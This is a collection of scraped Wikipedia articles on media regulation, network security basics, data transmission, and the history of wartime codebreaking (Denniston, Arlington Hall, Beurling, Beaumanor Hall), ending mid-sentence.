news producers.[7] InWestern Europe,self-regulationprovides an alternative to state regulatory authorities. In such contexts,newspapershave historically been free of licensing and regulation, and there has been repeated pressure for them to self-regulate or at least to have in-houseombudsmen. However, it has often been difficult to establish meaningful self-regulatory entities. In many cases, self-regulations exists in the shadow of state regulation, and is conscious of the possibility ofstate intervention. In many countries inCentral and Eastern Europe, self-regulatory structures seems to be lacking or have not historically been perceived as efficient and effective.[12] The rise ofsatellite channelsthat delivered directly to viewers, or through cable or online systems, renders much larger the sphere of unregulated programing. There are, however, varying efforts to regulate the access ofprogrammersto satellite transponders in parts of theWestern Europe,North America, theArab regionand inAsia and the Pacific. The Arab Satellite Broadcasting Charter was an example of efforts to bring formal standards and some regulatory authority to bear on what is transmitted, but it appears to not have been implemented.[13] Self-regulation is expressed as a preferential system by journalists but also as a support for media freedom and development organizations by intergovernmental organizations such asUNESCOandnon-governmental organizations. There has been a continued trend of establishing self-regulatory bodies, such as press councils, in conflict and post-conflict situations.[14] Major internet companies have responded to pressure by governments and the public by elaborating self-regulatory and complaints systems at the individual company level, using principles they have developed under the framework of theGlobal Network Initiative. The Global Network Initiative has grown to include several large telecom companies alongside internet companies such asGoogle,Facebookand others, as well ascivil society organizationsand academics.[15] TheEuropean Commission's 2013 publication, ICT Technology Sector Guide on Implementing theUnited Nations Guiding Principles on Business and Human Rights, impacts on the presence of independent journalism by defining the limits of what should or should not be carried and prioritized in the most popular digital spaces.[16] Public pressure on technology giants has motivated the development of new strategies aimed not only at identifying 'fake news', but also at eliminating some of the structural causes of their emergence and proliferation. Facebook has created new buttons for users to report content they believe is false, following previous strategies aimed at counteringhate speech and harassment online. These changes reflect broader transformations occurring among tech giants to increase their transparency. As indicated by theRanking Digital RightsCorporate Accountability Index, most large internet companies have reportedly become relatively more forthcoming in terms of their policies about transparency in regard to third party requests to remove or access content, especially in the case of requests from governments.[17][18]At the same time, however, the study signaled a number of companies that have become more opaque when it comes to disclosing how they enforce their own terms of service, in restricting certain types of content and account.[18]State governments can also use "Fake news" in order to spread propaganda.[19] In addition to responding to pressure for more clearly defined self-regulatory mechanisms, and galvanized by the debates over so-called 'fake news', internet companies such as Facebook have launched campaigns to educate users about how to more easily distinguish between 'fake news' and real news sources. Ahead of theUnited Kingdom national election in 2017, for example, Facebook published a series of advertisements in newspapers with 'Tips for Spotting False News' which suggested 10 things that might signal whether a story is genuine or not.[20]There have also been broader initiatives bringing together a variety of donors and actors to promotefact-checkingandnews literacy, such as the News Integrity Initiative at theCity University of New York's School of Journalism. This 14 million USD investment by groups including theFord Foundationand Facebook was launched in 2017 so its full impact remains to be seen. It will, however, complement the offerings of other networks such as the International Fact-Checking Network launched by thePoynter Institutein 2015 which seeks to outline the parameters of the field.[21]Instagram has also created a way to potentially expose "fake news" that is posted on the site. After looking into the site, it seemed as more than a place for political memes, but a weaponized platform, instead of the creative space it used to be.[22]Since that, Instagram has started to put warning labels on certain stories or posts if third-party fact checkers believe that false information is being spread.[23]Instagram works with these fact checkers to ensure that no false information is being spread around the site.[24]Instagram started this work in 2019, following Facebook with the idea as they started fact checking in 2016.[24] Developments intelecommunicationshave provided for media the ability to conduct long-distance communication via analog and digital media: Modern communication media include long-distance exchanges between larger numbers of people (many-to-manycommunication viaemail,Internet forums, andtelecommunications ports). Traditional broadcast media and mass media favorone-to-manycommunication (television,cinema, radio,newspaper,magazines, andsocial media).[25][26] Electronic media, specifically social media have become one of the top forms of media that people use in the twenty-first century. The percent of people that use social media and social networking outlets rose dramatically from 5% in 2005 to 79% in 2019.Instagram,Twitter,Pinterest,Tiktok, andFacebookare the most commonly used social media platforms. The average time that an individual spends on social media is 2.5 hours a day. This exponential increase of social media has additionally caused a change in which people communicate with others as well as receive information. About 53% use social media to read/watch the news.[27]Many people use the information specifically from social media influencers to understand more about a topic, business, or organization.[28]Social media has now been made part of everyday news production for journalists around the world.[29]Not only does social media provide more connection between readers and journalists, but it also cultivates the participation and community amongst technical communicators and their audiences, clients, and stakeholders.[30] The gaming community has grown exponentially, and about 65% have taken to playing with others, whether online or in-person.[31]Players online will communicate through the system of microphone applicability either through the game or a third party application such asDiscord. The improvements upon connectivity and software allowed for players online to keep in touch and game instantaneously, disregarding location almost entirely. With online gaming platforms it has been noted that they support diverse social gaming communities allowing players to feel a sense of belonging through the screen.[32] Gaming is an activity shared amongst others regardless of age, allowing for a diverse group of players to connect and enjoy their favorite games with. This helps with creating or maintaining relationships: friendships, family, or a significant other.[31] As with most interactive media content, games have ratings to assist in choosing appropriate games regarding younger audiences. This is done byESRB ratingsand consists of the following: E for Everyone, E for Everyone 10+, T for Teen, and M for Mature 18+. Whenever a new game is released, it is reviewed by associations to determine a suitable rating so younger audiences do not consume harmful or inappropriate content.[31]With these ratings it helps the risks and effects of gaming on younger audiences because the exposure of media is believed to influence children's attitudes, beliefs, and behaviors.[33] The usage and consumption of gaming has tremendously increased within the last decade with estimates of around 2.3 billion people from around the world playing digital and online video games.[34]The growth rate for the global market for gaming was expected to grow 6.2% towards 2020. Areas like Latin America had a 20.1% increase, Asia-Pacific - 9.2%, North America - 4.0%, and Europe -11.7%.[35] Studies show that digital and online gaming can be used as a communication method to aid in scientific research and create interaction. The narrative, layout, and gaming features all share a relationship that can deliver meaning and value that make games an innovative communication tool.[36]Research-focused games showed a connection towards a greater usage of dialogue within the science community as players had the opportunity to address issues with a game with themselves and scientists. This helped to push the understanding of how gaming and players can help advance scientific research via communication through games.[37] A vBook is aneBookthat isdigital first mediawithembeddedvideo,images,graphs,tables,text, and other useful media.[38] An E-book combines reading and listening media interaction. It is compact and can store a large amount of data which has made them very popular in classrooms.[39] Up until the 19th century the term was primarily applied totrafficandcouriersand tomeans of transportandtransportation routes, such as railways, roads and canals,[40]but also used to includepost ridersandstagecoachs. In 1861, the national economistAlbert Schäffledefined a means of communication as an aid to the circulation of goods and financial services, which included, among other things, newspapers,telegraphy, mail, courier services,remittance advice, invoices, andbills of lading.[41] In the period that followed, the "technical means of communication" increasingly came to the foreground, so that as early as 1895 the German newspaper "Deutsches Wochenblatt" reported that these technical means of communication had been improved to such an extent that "everyone all over the world has become our neighbor".[42] Not until the 20th century was the termmediumalso a synonym for these technical means of communication. In the 1920s the termmass mediastarted to become more popular. A distinction can be made betweenoral,written,screen-oriented transfer of informationanddocument transport:[43] In this table means of communication are mentioned that are no longer used today. Furthermore, a distinction can be made between: Means of communication in the narrower sense are those of technical communication. In companies (businesses, agencies, institutions) typical means of communication includedocuments, such as analyses,business cases,due diligencereviews,financial analyses, forms,business models,feasibility studies, scientific publications, and contracts. The means of natural communication or the "primary medias" (seeMedia studies) include: Means of communication are often differentiated inmodels of communication: Media as a means of communication in the future will be distinguished: Mass media refers to reaching many recipients from one – or less than one – sender simultaneously or nearly simultaneously. Due to their wide dissemination, mass media are suitable for providing the majority of the population with the same information.
https://en.wikipedia.org/wiki/Media_(communication)
Network securityis a umbrella term to describesecurity controls,policies, processes and practices adopted to prevent, detect and monitorunauthorizedaccess,misuse, modification, or denial of acomputer networkand network-accessible resources.[1]Network security involves the authorization of access to data in a network, which is controlled by thenetwork administrator. Users choose or are assigned an ID and password or other authenticating information that allows them access to information and programs within their authority. Network security covers a variety of computer networks, both public and private, that are used in everyday jobs: conducting transactions and communications among businesses,government agenciesand individuals. Networks can be private, such as within a company, and others which might be open to public access. Network security is involved in organizations, enterprises, and other types of institutions. It does as its title explains: it secures the network, as well as protecting and overseeing operations being done. The most common and simple way of protecting a network resource is by assigning it a unique name and a corresponding password. Network security starts withauthentication, commonly with a username and apassword. Since this requires just one detail authenticating the user name—i.e., the password—this is sometimes termed one-factor authentication. Withtwo-factor authentication, something the user 'has' is also used (e.g., asecurity tokenor 'dongle', anATM card, or amobile phone); and with three-factor authentication, something the user 'is' is also used (e.g., afingerprintorretinal scan). Once authenticated, afirewallenforces access policies such as what services are allowed to be accessed by the network users.[2][3]Though effective to prevent unauthorized access, this component may fail to check potentially harmful content such ascomputer wormsorTrojansbeing transmitted over the network.Anti-virus softwareor anintrusion prevention system(IPS)[4]help detect and inhibit the action of suchmalware. Ananomaly-based intrusion detection systemmay also monitor the network like wiresharktrafficand may be logged for audit purposes and for later high-level analysis. Newer systems combining unsupervisedmachine learningwith full network traffic analysis can detect active network attackers from malicious insiders or targeted external attackers that have compromised a user machine or account.[5] Communication between two hosts using a network may be encrypted to maintain security and privacy. Honeypots, essentiallydecoynetwork-accessible resources, may be deployed in a network assurveillanceand early-warning tools, as the honeypots are not normally accessed for legitimate purposes. Honeypots are placed at a point in the network where they appear vulnerable and undefended, but they Network security involves the authorization of access to data in a network, which is controlled by the network administrator. Users choose or are assigned an ID ...are actually isolated and monitored.[6]Techniques used by the attackers that attempt to compromise these decoy resources are studied during and after an attack to keep an eye on newexploitationtechniques. Such analysis may be used to further tighten security of the actual network being protected by the honeypot. A honeypot can also direct an attacker's attention away from legitimate servers. A honeypot encourages attackers to spend their time and energy on the decoy server while distracting their attention from the data on the real server. Similar to a honeypot, ahoneynetis a network set up with intentional vulnerabilities. Its purpose is also to invite attacks so that the attacker's methods can be studied and that information can be used to increase network security. A honeynet typically contains one or more honeypots.[7] Previous research on network security was mostly about using tools to secure transactions and information flow, and how well users knew about and used these tools. However, more recently, the discussion has expanded to considerinformation securityin the broader context of thedigital economyand society. This indicates that it's not just about individual users and tools; it's also about the larger culture of information security in our digital world.[8] Security management for networks is different for all kinds of situations. A home or small office may only require basic security while large businesses may require high-maintenance and advanced software and hardware to prevent malicious attacks fromhackingandspamming. In order to minimize susceptibility to malicious attacks from external threats to the network, corporations often employ tools which carry out network security verifications]. Andersson and Reimers (2014) found that employees often do not see themselves as part of their organization's information security effort and often take actions that impede organizational changes.[9] Networks are subject toattacksfrom malicious sources. Attacks can be from two categories: "Passive" when a network intruder intercepts data traveling through the network, and "Active" in which an intruder initiates commands to disrupt the network's normal operation or to conduct reconnaissance and lateral movements to find and gain access to assets available via the network.[10] Types of attacks include:[11]
https://en.wikipedia.org/wiki/Network_security
Intelecommunications,node-to-node data transfer[1]is the movement of data from onenodeof anetworkto the next. In theOSI modelit is handled by the lowest two layers, thedata link layerand thephysical layer. In most communication systems, the transmitting point appliessource coding,[2]followed bychannel coding, and lastly,line coding. This produces thebasebandsignal. The presence of filters may performpulse shaping. Some systems then usemodulationto multiplex many baseband signals into abroadbandsignal. The receiver un-does these transformations in reverse order: demodulation, trellis decoding, error detection and correction, decompression. Some communication systems omit one or more of these steps, or use techniques that combine several of these steps together. For example, aMorse codetransmitter combines source coding, channel coding, and line coding into one step, typically followed by anamplitude modulationstep.Barcodes, on the other hand, add a checksum digit during channel coding, then translate each digit into a barcode symbol during line coding, omitting modulation. Source coding is the elimination of redundancy to make efficient use of storage space and/or transmission channels.[citation needed] Examples ofsource codingare: Indigitaltelecommunications,channel coding[3]is a pre-transmission mapping applied to adigital signalor data file, usually designed to make error-correction (or at leasterror detection) possible. Error correction is implemented by using moredigits(bitsin cases of binary channel) than the number strictly necessary for the samples and having the receiver compute the most likely valid message that could have resulted in the received one. Types ofchannel codinginclude: Line codingconsists of representing thedigital signalto be transported, by an amplitude- and time-discrete signal, that is optimally tuned for the specific properties of the physical channel (and of the receiving equipment). Thewaveformpattern of voltage or current used to represent the 1s and 0s of a digital signal on a transmission link is calledline encoding. After line coding, the signal can directly be put on a transmission line, in the form of variations of the current. The common types of line encoding areunipolar,polar,bipolarandManchester encoding. Line coding should make it possible for the receiver to synchronise itself to thephaseof the received signal. It is also preferred for the line code to have a structure that will enable error detection. Examples ofline codinginclude:(see main articleline code) Modulationis the process of varying acarrier signal, typically asine waveto use that signal to conveyinformation. One of the three key characteristics of a signal are usually modulated: itsphase,frequencyoramplitude. Indigitalmodulation, the changes in the signal are chosen from a fixed list (themodulation alphabet) each entry of which conveys a different possible piece of information (a symbol). Inanaloguemodulation, the change is applied continuously in response to the data signal. Modulation is generally performed to overcome signal transmission issues such as to allow Carrier signals are usually high frequency electromagnetic waves. Examples ofmodulationinclude:
https://en.wikipedia.org/wiki/Node-to-node_data_transfer
TransmitorTransmissionmay refer to:
https://en.wikipedia.org/wiki/Transmission_(disambiguation)
CommanderAlexander"Alastair"Guthrie DennistonCBCMGCBERNVR(1 December 1881 – 1 January 1961) was a Scottish codebreaker, deputy head of theGovernment Code and Cypher School(GC&CS) andhockeyplayer.[1][2]Denniston was appointed operational head of GC&CS in 1919 and remained so until February 1942.[3][4] Denniston was born inGreenock,Renfrewshire, the son of a medical practitioner.[3]He studied at theUniversity of Bonnand theUniversity of Paris.[3]Denniston was a member of the Scottish Olympic hockey team in1908and won a bronze medal. He played as a half-back, and his club team was listed as Edinburgh. In the IOC's official 1908 report, he is listed as Dennistoun rather than Denniston.[2] In 1914, Denniston helped formRoom 40in the Admiralty, an organisation responsible for intercepting and decrypting enemy messages. In 1917, he married a fellow Room 40 worker, Dorothy Mary Gilliat.[3] AfterFirst World War, Denniston, recognising the strategic importance of codebreaking, kept the Room 40 activity functioning.[5]: 8Room 40 was merged with its counterpart in the Army,MI1bin 1919, renamed the Government Code and Cypher School (GC&CS) in 1920 and transferred from the Navy to the Foreign Office. Denniston was chosen to run the new organisation.[6] With the rise ofHitler, Denniston began making preparations. Following the practice of his superiors at Room 40, he contacted scientists from Oxford and Cambridge (includingAlan TuringandGordon Welchman) asking if they would be willing to serve if war broke out.Bletchley Parkwas chosen by MI6 chief AdmiralHugh Sinclairas the location for the codebreaking effort because it was at arail junctionon the west coast main line 47 miles (76 km) north of London with good rail connections to Oxford and Cambridge. Sinclair acquired the Bletchley Park property and Denniston was assigned to prepare the site and design the huts to be built on the grounds. The GC&CS moved to the new location in August 1939, just before theInvasion of Polandand the start of theSecond World War. Its name changed toGovernment Communications Headquarters(GCHQ).[5]: 9–10 On 26 July 1939, five weeks before the outbreak of war, Denniston was one of three Britons (along withDilly Knoxand Humphrey Sandwith) who participated in the trilateral Polish-French-British conference held in theKabaty Woodssouth ofWarsaw, at which thePolishBiuro Szyfrów(Cipher Bureau) initiated the French and British into thedecryptionofGermanmilitaryEnigmaciphers.[7] Denniston remained in command until he was admitted to hospital in June 1940 for abladder stone. Although ill, he flew to the United States in 1941 to make contact with American cryptographers includingWilliam Friedman. Denniston returned to Bletchley Park for a while but moved to London later in 1941 to work on diplomatic traffic.[5]: 10 Despite his knowledge of the success of Polish cryptologists against Enigma, Denniston shared the general pessimism about the prospects of breaking the more complex Naval Enigma encryption until as late as the summer of 1940, having told the Head of Naval Section at Bletchley: "You know, the Germans don't mean you to read their stuff, and I don't expect you ever will."[8]The advent ofBanburismusshortly afterwards showed his pessimism to be misplaced. In October 1941, the originator of the technique,Alan Turing, along with fellow senior cryptologistsGordon Welchman,Stuart Milner-BarryandHugh Alexanderwrote to Churchill, over the head of Denniston, to alert Churchill to the fact that a shortage of staff at Bletchley Park was preventing them from deciphering many messages. An addition of personnel, small by military standards, could make a big difference to the effectiveness of the fighting effort. The slow response to previous requests had convinced them that the strategic value of their work was not understood in the right quarters. In the letter, there was praise for the 'energy and foresight' of CommanderEdward Travis.[9] Churchill reacted to the letter immediately, ordering "Action this day". Resources were transferred as fast as possible.[10] In February 1942, GC&CS was reorganised. Travis, Denniston's second in command and chief of the Naval section, succeeded Denniston at Bletchley Park, overseeing the work on military codes and ciphers. When Travis took over, he "presided over an administrative revolution which at last brought the management of Intelligence into line with its mode of production".[9] Denniston and his wife had two children: a son and daughter. Their son,Robin, was educated atWestminster SchoolandChrist Church, Oxford. After Alastair's demotion and resulting decreased income, Robin's school fees were paid by benefactors. However, the Dennistons' daughter had to leave her school due to lack of funds.[11] Denniston retired in 1945, and later taught French and Latin inLeatherhead.[3] William Friedman, the American cryptographer who broke the JapanesePurple code, later wrote to Denniston's daughter: "Your father was a great man in whose debt all English-speaking people will remain for a very long time, if not forever. That so few should know exactly what he did ... is the sad part."[5]: 11 Robin distinguished himself as a publisher. In 2007, he publishedThirty Secret Years, abiographyof his father that consolidated his reputation in GCHQ history.[11] In the 2014 filmThe Imitation Game, he is portrayed byCharles Dance.[15]
https://en.wikipedia.org/wiki/Alastair_Denniston
Arlington Hall(also calledArlington Hall Station) is a historic building inArlington, Virginia. Originally it was a girls' school and later the headquarters of theUnited States Army'sSignal Intelligence Service(SIS)cryptographyoperations duringWorld War II. The site houses theGeorge P. Shultz National Foreign Affairs Training Centerand theArmy National Guard'sHerbert R. Temple Jr.Readiness Center. It is located onArlington Boulevard(U.S. Route 50) between S. Glebe Road (State Route 120) and S. George Mason Drive. Arlington Hall was founded in 1927 as a privatepost-secondary women's educational institution, which by 1941, was on a 100-acre (0.40 km2) campus and was called the Arlington Hall Junior College for Women. The school had financial problems in the 1930s and eventually became a non-profit institution in 1940.[1]On June 10, 1942, theU.S. Armytook possession of the facility under the War Powers Act for use by itsSignals Intelligence Service.[2] During World War II, Arlington Hall was in many respects similar toBletchley ParkinBuckinghamshire, England(although BP also covered naval codes) and was one of only two primarycryptographyoperations inWashington(the other was theNaval Communications Annex, which was also housed ina commandeered private girls' school). Arlington Hall concentrated its efforts working on theJapanesesystems (includingPURPLE) while Bletchley Park concentrated on European combatants. Initially work was on Japanese diplomatic codes asJapanese army codeswere not solved until April 1943, but in September 1943 with success on the Army codes they were put underSolomon Kullbackin a separate branch B-II, with other mainly diplomatic work underFrank Rowlettin B-III (which also had the Bombes and Rapid Analytical Machinery). The third branch B-I translated Japanese decrypts.[3] The Arlington Hall effort was comparable in influence to other Anglo-AmericanSecond World War-era technological efforts, such as the cryptographic work at Bletchley Park, the Naval Communications Annex, development of sophisticated microwaveradaratMassachusetts Institute of Technology(MIT)'sRadiation Lab, and theManhattan Project's development of theatomic bombsused onHiroshimaandNagasakiin August 1945 to abruptly end the war and which later initiated further development ofnuclear weapons. After World War II, the "Russian Section" at Arlington Hall expanded. Work on diplomatic messages benefited from additional technical personnel and new analysts—among them Samuel Chew, who had focused onJapan, and linguistMeredith Gardner, who had worked on bothGermanandJapanesemessages. Chew had considerable success at defining the underlying structure of the codedRussiantexts. Gardner and his colleagues began analytically reconstructing theKGB(theSoviet Union's Committee for State Security) spy agency codebooks. Late in 1946, Gardner broke the codebook's "spell table" for encoding English letters. With the solution of the spell table, SIS could read significant portions of messages which included English names and phrases. Gardner soon found himself reading a 1944 message listing prominent atomic scientists, including several with theManhattan Project. Efforts to decipher Soviet codes continued under the classified and caveatedVenona project. Another problem soon arose—that of determining how and to whom to disseminate the extraordinary information Gardner was developing. SIS's reporting procedures did not seem appropriate because the decrypted messages could not even be paraphrased for Arlington Hall's regular intelligence customers without divulging their source. By 1946, SIS knew nothing about the federal grand jury impaneled inManhattan, New Yorkto probe the espionage and disloyalty charges stemming fromElizabeth Bentley's defection and other defectors from Soviet intelligence, so no one in the U.S. Government was aware that evidence against the Soviets was suddenly developing on two adjacent tracks. In late August or early September 1947, theFederal Bureau of Investigation(FBI) was informed that the Army Security Agency had begun to break into Soviet espionage messages. By 1945, the Soviets had penetrated Arlington Hall with the placement ofBill Weisbandwho worked there for several years. The government's knowledge of his treason apparently was not revealed until its publication in a 1990 book co-authored by a high-level KGB defector. Arlington Hall came under the aegis of theNational Security Agencyafter the agency was created in 1952. From 1945 to 1977, Arlington Hall was the headquarters of theUnited States Army Security Agencyand for a brief time in late 1948, the newly formedUnited States Air Force Security Service(USAFSS) until they moved toBrooks Air Force BaseinSan Antonio, Texas. When theUnited States Army Intelligence and Security Command(INSCOM) was commissioned at Arlington Hall on January 1, 1977, INSCOM absorbed the functions of the Army Security Agency into its operations. INSCOM remained at Arlington Hall until the summer of 1989, when INSCOM left for Fort Belvoir,Virginia. Beginning in January 1963, Arlington Hall served as the premier facility of the newly createdDefense Intelligence Agency(DIA).[4]In 1984, DIA departed Arlington Hall for its newheadquartersonJoint Base Anacostia–Bolling(formerBolling Air Force BaseinWashington, D.C.), a move that was complete by December 1984.[5][6] Arlington Hall was also home in the late 1950s and early 1960s to theArmed Services Technical Information Agency(ASTIA) which disseminated classified research to defense contractors. In 1989, theU.S. Department of Defensetransferred the eastern portion of Arlington Hall to theDepartment of State. In October 1993, this portion of the site became theNational Foreign Affairs Training Centerwhen the State Department'sForeign Service Institute(FSI) moved there[7]from its prior location in the Mayfair Building in Washington, D.C. The National Foreign Affairs Training Center was renamed as theGeorge P. Shultz National Foreign Affairs Training Centerin a ceremony held on May 29, 2002, named forGeorge P. Shultz, formerSecretary of the TreasuryandSecretary of State.[8] In January 2008, construction workers discovered an unexplodedCivil War-eraParrott rifleshellunderneath Arlington Hall. The shell had a length of one foot and a diameter of five inches. U.S. Armyexplosive ordnance disposaltechnicians fromFort Belvoirwere brought in to dispose of the antiquemunition.[9] TheNational Park Servicedetermined that Arlington Hall Station Historic District was eligible for inclusion on theNational Register of Historic Placeson October 7, 1988 (although it has not been officially listed).[10]The historic main building of the former girls' school now houses classrooms and administrative offices for components of theForeign Service Institute, on the campus of the George P. ShultzNational Foreign Affairs Training Center. The western portion of Arlington Hall site presently houses theArmy National GuardReadiness Center, which was named forHerbert R. Temple Jr.in 2017. 38°52′03″N77°06′13″W / 38.8676°N 77.1036°W /38.8676; -77.1036
https://en.wikipedia.org/wiki/Arlington_Hall
Arne Carl-August Beurling(3 February 1905 – 20 November 1986) was aSwedishmathematicianandprofessorofmathematicsatUppsala University(1937–1954) and later at theInstitute for Advanced StudyinPrinceton, New Jersey. Beurling worked extensively inharmonic analysis,complex analysisandpotential theory. The "Beurling factorization" helped mathematical scientists to understand theWold decomposition, and inspired further work on theinvariant subspacesof linear operators andoperator algebras, e.g. Håkan Hedenmalm's factorization theorem forBergman spaces. He is perhaps most famous for single-handedly decrypting an early version of the German cipher machineSiemens and Halske T52in a matter of two weeks during 1940, using only pen and paper. This machine's cipher is generally considered to be more complicated than that of the more famousEnigma machine. Beurling's method of decrypting military telegrams between Norway and Germany worked from June 1940 right up until 1943 when the Germans changed equipment. Beurling was born on 3 February 1905 inGothenburg, Sweden and was the son of the landowner Konrad Beurling and baroness Elsa Raab.[1]Aftergraduatingin 1924, he was enrolled at theUppsala Universitywhere he received a Bachelor of Arts degree in 1926 and two years later a Licentiate of Philosophy degree.[1] Beurling was assistant teacher at Uppsala University from 1931 to 1933.[1]He received his doctorate in mathematics in 1933 for his dissertationÉtudes sur un problème de majoration.[2]Beurling was adocentof mathematics at Uppsala University from 1933 and then professor of mathematics from 1937 to 1954.[1] In the summer of 1940 he single-handedlydecipheredandreverse-engineeredan early version of theSiemens and Halske T52also known as theGeheimfernschreiber("secret teletypewriter") used byNazi GermanyinWorld War IIfor sendingcipheredmessages.[3]The T52 was one of the so-called "Fish cyphers", that, using transposition, created nearly one quintillion (893,622,318,929,520,960) different variations. It took Beurling two weeks to solve the problem using pen and paper. Using Beurling's work, a device was created that enabled Sweden to decipher Germanteleprintertraffic passing through Sweden fromNorwayon a cable. In this way, Swedish authorities knew aboutOperation Barbarossabefore it occurred.[4]Since the Swedes would not reveal how this knowledge was attained, the Swedish warning was not treated as credible by Soviets[citation needed]. This became the foundation for the SwedishNational Defence Radio Establishment(FRA). The cypher in theGeheimfernschreiberis generally considered to be more complex than the cypher used in the Enigma machines.[5] He was visiting professor atHarvard Universityfrom 1948 to 1949.[6]From 1954 he was professor at theInstitute for Advanced Studyin Princeton, New Jersey,United States, where he took overAlbert Einstein's office.[7] He was thedoctoral advisorofLennart CarlesonandCarl-Gustav Esseen. Arne Beurling was first married (1936–40) to Britta Östberg (born 1907), daughter of Henrik Östberg and Gerda Nilsson. In 1950 he married Karin Lindblad (1920–2006), daughter of ironmonger Henric Lindblad and Wanja Bengtsson.[1]Karin was a distinguished Ph.D. student from Uppsala University. When they lived in Princeton, she worked in a biochemistry lab at Princeton University.[8]He had two children from his first marriage — Pehr-Henrik (1936–1962) and Jane (1938–1992).[1] Beurling's great-grandfather wasPehr Henrik Beurling(1758 or 1763–1806), who founded a high quality clock factory inStockholmin 1783. Arne Beurling died in 1986 and was buried atNorra begravningsplatseninSolna.[9] Beurling's prowess as a cryptanalysist is the subject of the 2005 short operaKrypto CEGbyJonas SjöstrandandKimmo Eriksson.
https://en.wikipedia.org/wiki/Arne_Beurling
Beaumanor Hallis astately homewith a park in the small village ofWoodhouseon the edge of theCharnwood Forest, near the town ofLoughboroughinLeicestershire, England. The present hall was built in 1842–1848 by architectWilliam Railtonfor the Herrick family, with previous halls dating back to the 14th century.[1][2][3]It was used during theSecond World Warfor military intelligence.[4]The hall is aGrade II* listed building.[5] It is owned byLeicestershire County Councilas a training centre, conference centre and residential facility for young people.[6] Following theNorman Conquest, the land in the area was owned byHugh d'Avranches, 1st Earl of Chester.[7]In the 13th century ownership passed to the Despenser family, who created a deer park and hunting lodge at what is now Beaumanor.[7]In 1327 the land passed toHenry de Beaumont, for whom a new house, Beau Manor was built in 1330, Beaumont also having the nearby church built in 1338.[8][9]The house was replaced by a new construction in 1595 forSir William Herrick, a government official underElizabeth Iand later a member of parliament for Leicester.[9]The house was extensively altered around 1610, and stood until 1725, when it was replaced by a smaller house, completed in 1726.[9][10]The third hall was demolished in 1842, and the present hall built for William Herrick over a seven-year period between 1842 and 1848 by William Railton in the Jacobean style.[9]The hall was constructed by builder George Bridgart of Derby,[undue weight?–discuss]using stone from Derbyshire quarries, primarilyDuffieldandAshover, with floors of marble fromAshford.[9]When completed, the building had cost £37,000.[11] William Perry Herrick (1794 – 1876) who built the present house in about 1850 was born inWolverhamptonin 1794. His father was Thomas Bainbrigge Herrick who was a barrister and his mother was Mary Perry daughter of James Perry of Eardisley Park. William spent his childhood in his family home Merridale House (now calledBantock House) inWolverhampton.[12]He went to Oxford and became a barrister. In 1832 his uncle who owned Beaumanor died and as he had no male heirs the property was inherited by William. He also inherited Earlisley Park in 1852 when his maternal uncle James Perry died.[13]These properties and their associated landholdings made him a very wealthy man. He lived with his younger sister Mary Ann Herrick (1796-1871) at Beaumanor for many years. Mary Ann had inherited money from her mother in her own right and was known to be a great benefactor. An account of her generosity was contained in a book about Leicestershire. It stated: William also gave generously to the Anglican Church. In 1872 he paid for the construction ofSt Mark's Church, Leicesterwith some help from his sister.[15] In 1862 William married Sophia Christie (1831-1915) who was 37 years his junior and the daughter of Jonathan Henry Christie, a London barrister. The couple had no children. His sister Mary Ann who continued to live at Beaumanor died in 1871 and William died in 1876. He left all of his property to his wife Sophia and on her death to his relativeMontagu Curzon. Sophia managed the Beaumanor estate for the next 40 years and was well regarded by the tenants. She kept a fairly large number of household staff one of whom was Elizabeth Ellerbeck (1843 – 1919) the housekeeper who remained with her for over 30 years. Sophia died in 1915 and Beaumanor was inherited by William's relative William Montagu Curzon who took the additional surname of Herrick in 1915 when he became owner of Beaumanor. William Montagu Curzon Herrick (1891-1945) was born in 1891 inLondon. His father was Colonel Montagu Curzon who was named by William Herrick as his heir when his wife Sophia died.[16]In 1898 shortly after Sophia built Garatshay which is near Beaumanor, the family moved to this residence. Montagu died in 1907 and did not gain his inheritance. His wife Esme remarried the Rev. William Arthur King, Vicar of Woodhouse, in London on 26 October 1909[17]and the family continued to live at Garatshay. She died in 1939. Shortly after William inherited Sophia's property he marriedMaud Kathleen Cairns Plantagenet Hastings(known as Kathleen) who was the daughter of the 15th Earl of Huntingdon.[18] In 1923 a wedding was held at Beaumanor which was widely reported in the newspapers.[19]It was the marriage between Dorothy Hastings, the cousin of Kathleen, and the Queen's nephewLord Eltham. One newspaper gave the following description of the wedding. William and Kathleen held frequent house parties at Beaumanor and one of them hosted in 1926 is shown in the photograph. Until just preceding theSecond World Warin 1939, the Herrick family owned the park. The estate consisted of Beaumanor Hall and 6,500 acres of land, including several farms, Beacon Hill, the Hangingstone Rocks, St Mary in the Elms church, the vicarage house (Garats Hay), workers houses/cottages along Forest Road and 350 acres (1.4 km²) ofparkland.[21] In 1939 theWar Officerequisitioned the estate, including Garats Hay, and the vicar moved to a cottage in the village. The park became a secretlistening stationwhere encrypted enemy signals (Morse code) were intercepted and sent to the famous Station X atBletchley Park(bymotorcycleevery day) for decoding. Beaumanor Park was to be the home of the War Office 'Y' Group for the duration of the war. After the war (1945) the estate passed back to the Herrick family, and on the death of William Montague Curzon-Herrick, the Beaumanor estate passed to Lt. Col. Assheton Penn Curzon Howe Herrick, who in 1946, for financial reasons (death duties, etc.), decided to dispose of his assets.[21]In a sale conducted atLoughborough Town Hallon 20–21 December 1946, the War Office bought both Beaumanor Hall and Garats Hay and some of the immediate surrounding grounds used during the war. From 1939 the hall itself was occupied by Number 6 Intelligence School, and the rooms inside Beaumanor Hall were used as a training centre for the Civilian Staff of thePost Office, Civil Service andMerchant Navy. TheRoyal Corps of Signals,Royal NavyandRoyal Air Forcewere also having military staff trained inside the hall. The huge cellars stretching underneath the whole of the building were used as electricians' workshops. The outbuildings and stables at the side and rear of the hall were used as workshops. These housed aerial riggers, a barracks store, M T Office, transport garage workshop and the instrument mechanics' laboratory. By late 1941, most of theRoyal NavyandRoyal Air Forcemilitary personnel had left for duties at otherY-stations, and the main part of the site became the home of the Royal Signals. Military personnel were still being trained inside the hall for various tasks until the end of the war. In February 1942 the first of the newly trained ladies of theAuxiliary Territorial Servicearrived at Beaumanor and were billeted in outlying villages and Garats Hay hall. Beaumanor became one of the most important of the small number of strategic intercept stations, or "Y stations", intercepting enemy radio transmissions and relaying the information to "Station X", atBletchley Park, for decryption and analysis.[22]It is known that one of the first confirmations of the successfulOperation Chastisemission was received here. It is also widely rumoured that this listening post knew details of theKatyn massacreas early as 1941; however, the British government files were not released to the public, as it would implicate surviving perpetrators. By 1943, Room 61 on the top floor of the hall was being used forRadio fingerprinting(Ackbar 13). This new technology was employed to uniquely identify the particular wireless set that was being used to send the transmissions. Special receiving sets filmed the signals as they came in, like a cathode ray tube, and then the signals were captured on film and developed. Light tables were then used to compare the signals in order to verify who was 